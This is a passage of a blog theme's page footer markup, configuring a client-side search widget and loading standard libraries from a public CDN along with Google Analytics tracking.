document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lazysizes@5.3.2/lazysizes.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/unregister.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-NJBDP43045"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-NJBDP43045'); }); </script>
